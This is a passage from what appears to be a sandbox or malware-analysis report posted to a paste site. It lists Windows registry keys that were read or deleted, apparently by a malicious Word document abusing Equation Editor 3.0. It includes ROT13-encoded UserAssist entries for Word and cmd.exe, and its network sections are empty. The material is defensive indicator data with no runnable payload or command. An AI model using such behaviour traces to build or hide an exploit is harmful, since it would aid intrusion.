- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OfficeSoftwareProtectionPlatform\\ServiceSessionId",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\NHRTimes"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\f=q",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTT",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement